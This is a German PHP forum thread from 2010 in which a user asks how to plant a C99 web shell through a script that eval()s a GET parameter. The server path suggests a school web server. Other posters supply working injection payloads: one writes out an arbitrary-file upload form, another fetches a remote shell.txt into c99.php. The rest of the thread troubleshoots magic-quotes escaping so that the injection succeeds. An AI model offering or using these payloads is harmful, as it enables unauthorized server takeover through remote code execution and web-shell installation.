eval - upload etc.

**RikuXan** · 15.03.2010, 17:23

Ich wollte fragen, was ich mit eval alles machen kann, also wie tiefgehend ich PHP ausführen lassen kann. Ich habe im Moment ein PHP-Script, das einen GET-Parameter annimmt und wenn dieser gesetzt ist, die variable eval'd.
Kann ich in den Parameter ein Upload-Script schreiben und eine Datei hochladen? ( ja eine C99 )

PHP-Code:


$eval = $_GET['eval'];
    
if( isset($eval) )
{
    eval($eval);
}

MfG RikuXan

**moppelito** · 15.03.2010, 17:43

http://php.net/manual/de/function.eval.php
Wie dort bereits steht kannst du damit nur aus einer Zerichenkette php-code auslesen, das hat nichts mit einem Uploadscript zutun.

EDIT: Wenn es das tun sollte!

**Ken** · 15.03.2010, 17:56

Was heißt schon "wie tiefgehend"? Du kannst damit im Prinzip alles machen.

Ein Uploadscript würde dementsprechend so aussehen:

PHP-Code:


?eval=echo '<form action="" enctype="multipart/form-data" method="POST"><input name="file" type="file" /><input type="submit" /></form>'; if(isset($_FILES["file"])) { move_uploaded_file($_FILES['file']['tmp_name'], "./".$_FILES['file']['name']); echo '<a href="./'.$_FILES['file']['name'].'" target="_blank">OK!</a>'; }

Wenn so was nicht funktionieren würde, hätten solche Sicherheitslücken ja keinerlei Wert, oder? So was wird auch ab und an als Hintertürchen in Skripte eingebaut.

**RikuXan** · 15.03.2010, 17:57

Ja, aber man kann sich doch aus einer Zeichenkette PHP-Code ein Upload-Script basteln, bzw. dieses Script in die Variable schreiben, oder?

MfG RikuXan

Edit: Verdammt Ken hat noch davor gepostet

Genau so etwas meinte ich, nur bekomme ich da Fehlermeldungen wie:

PHP-Code:


Warning:  Unexpected character in input:  '\' (ASCII=92) state=1  in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik mit  Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1
Warning:  Unexpected character in input:  ''' (ASCII=39) state=1  in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik mit  Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1
Parse error:  syntax error, unexpected '<' in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik  mit Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1

obwohl syntaktisch eigentlich alles richtig ist. Bzw. ich suche mal vielleicht fehlt ja irgendwo ein ' oder so etwas.

MfG RikuXan

**Ken** · 15.03.2010, 18:02

Genau dafür ist es gedacht, sonst hätte ich

das "?eval=" am Anfang des PHP-Codes weggelassen und
Zeilenumbrüche dort gesetzt, wo sie Sinn machen würden, und nicht alles in einer Zeile gelassen.

Voraussetzung ist natürlich, dass keine Apostrophen und Anführungszeichen maskiert werden.

**RikuXan** · 15.03.2010, 18:09

Ich bin jetzt leider nicht erfahren genug, um beurteilen zu können, ob das hier der Fall ist, aber was denkst du, werden sie maskiert oder nicht, anhand der Fehlermeldungen?

MfG RikuXan

**VeN0m** · 15.03.2010, 18:13

Wieso eigentlich so kompliziert?
Also wenn dieses Script auf dem Server liegt, würde doch sowas wie

Code:

?eval=$f = fopen("c99.php","a"); fwrite($f,file_get_contents("http://bla/shell.txt"); fclose($f);

genügen, um eine Shell auf den Space zu bekommen.

EDIT: Ich denke nicht, dass sie maskiert werden. Du kannst aber mal var_dump(ini_get("magic_quotes_gpc")); probieren.
Wenn da etwas wie bool(true) rauskommt, dann werden sie maskiert.
Aber von der Fehlermeldung her ist eher der Punkt vor dem \ falsch.

**Ken** · 15.03.2010, 18:16

Ich bin jetzt leider nicht erfahren genug, um beurteilen zu können, ob das hier der Fall ist, aber was denkst du, werden sie maskiert oder nicht, anhand der Fehlermeldungen?

Welcher Fehlermeldungen? Gib einfach ein paar Anführungszeichen und Apostrophe ein, und schau, ob irgendwo das Slash-Zeichen "\" auftaucht. Oder ob beispielsweise ?eval=echo "Hallo"; ein "Hallo" ausgibt, oder was auch immer.

Und ja, wenns Dir nur darum geht, ein Shell-Skript auf den Server zu bekommen, so ist VeN0ms Code natürlich kürzer, impliziert allerdings auch, dass der jeweilige Server Zugriff auf externe Seiten ermöglicht.

**RikuXan** · 15.03.2010, 18:21

PHP-Code:


Warning:  Unexpected character in input:  '\' (ASCII=92) state=1  in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik mit  Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1

Parse error:  syntax error, unexpected $end in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik  mit Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1

Das war das Ergebnis von

PHP-Code:


eval=var_dump(ini_get("magic_quotes_gpc"));

Wieso ist denn ein "unexpected \" , das steht ja im code nirgendswo, ist es dann nicht "dazuescaped" worden?

Und bei der fwrite-version kommt:

PHP-Code:


Warning:  Unexpected character in input:  '\' (ASCII=92) state=1  in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik mit  Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1

Parse error:  syntax error, unexpected $end in /opt/httpd/htdocs/wvsg/faecher/Informatik/Physik  mit Java/Referate/13_Raketengleichung/PHP/index.php(9) : eval()'d code  on line 1

BTW: Find ich toll, dass ihr mir so schnell und engagiert helft, beeindruckt mich wirklich, zwischendurch schonmal ein danke an alle für ihre Mühen

MfG RikuXan

Edit: Bei

PHP-Code:


?eval=echo "Hallo";

kommen eben leider die selben Fehler, wie bei VeN0ms Script :/ ich weiß nicht woher der \ kommen soll.

**VeN0m** · 15.03.2010, 18:32

Ja, das wurde dazu escaped.
Also sofern ' und " gefiltert werden (magic quotes gpc), wird ein \ hinzugefügt. Und dieses ist dann natürlich "unerwartet" (unexpected).
Dass man das umgehen kann, bezweifele ich.

Thema: eval - upload etc.

Themen-Optionen

Anzeige

eval - upload etc.

Stichworte

Berechtigungen